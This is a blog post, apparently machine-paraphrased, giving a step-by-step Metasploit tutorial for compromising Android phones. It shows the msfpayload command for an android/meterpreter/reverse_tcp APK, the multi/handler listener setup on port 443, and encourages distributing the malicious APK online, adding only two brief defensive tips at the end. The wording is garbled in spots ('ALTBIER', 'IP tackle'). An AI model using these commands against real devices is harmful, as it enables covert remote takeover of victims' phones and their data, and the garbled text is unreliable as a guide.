Hacking Android Smartphone Using MetaSploit – Step By Step Tutorial

Published by Sundareswaran on

These days mobile users are improving day by day, the particular security threat is also increasing together with the development of its users. Our tutorial for nowadays is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose an android phone for this tutorial? simply because lately android phone growing very quickly worldwide. Here in China, you will get an android phone for just US$ 30 it’s the reason why android growing fast.

What is Android? according to Wikipedia:

Android is usually an operating system in line with the Linux kernel and created primarily for touchscreen mobile phones such as smartphones plus tablet computers. Initially created by Android, Inc., which usually Google backed financially plus later acquired in 2006, Android was unveiled in 2007 together with the founding associated with the Open Handset Alliance: a consortium of hardware, software, and telecommunication businesses devoted to advancing open up standards for mobile gadgets.
and exactly what is APK? in accordance to Wikipedia:

Android application package file (APK) is usually the file format utilized to distribute and install application software and middleware on to Google’s Android operating program; very similar to an MSI package deal in Windows or a Deb package in Debian-based operating systems like Ubuntu.

Here is some initial information for this tutorial:

Attacker IP tackle: 192. 168. 8. 94

Attacker port to receive connection: 443


1. Metasploit framework (we use Kali Linux 1. 0. 6 in this tutorial)

2. Android smartphone (we use HTC One Android 4. 4 KitKat)

Step-by-step Hacking Android Smartphone Tutorial using Metasploit:

1. Open up terminal (CTRL + ALTBIER + T) view tutorial how to create linux keyboard shortcut.

2 . We will utilize Metasploit payload framework to generate exploit for this tutorial.

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

As described above that attacker IP address is, below is our screenshot when executed the command

3. Because our payload is reverse_tcp where attacker expects the victim to connect back to attacker machine, the attacker needs to established up the handler to handle incoming connections to the port already specified above. Type msfconsoleto go to the Metasploit console.


use exploit/multi/handler –> we will use Metasploit handler

set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.


set lhost –> attacker IP address

set lport 443 –> port to listen the reverse connection

exploit –> start to listen incoming connection

5. Attacker already have the particular APK’s file and right now he will start distribute it (I don’t have to explain how to distribute this particular file, internet is the good place for distribution  ).

6. Short stories the victim (me myself) down load the malicious APK’s document and install it. After victim open the application, attacker Metasploit console obtain something like this:

7. It’s mean that attacker already inside the victim android smartphone and he can do everything with victim phone.


1. Don’t install APK’s from the unknown source.

2. If you really want to install APK’s from unknown source, make sure you can view, read and examine the source program code. The picture below is the source code of our malicious APK’s in this tutorial.

Share this post if you found it useful 🙂

Categories: Hacking Tutorial

1 Comment

Cfern · October 6, 2018 at 2:51 pm

I like a private lesson on this.
Care to consider. Thanks

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.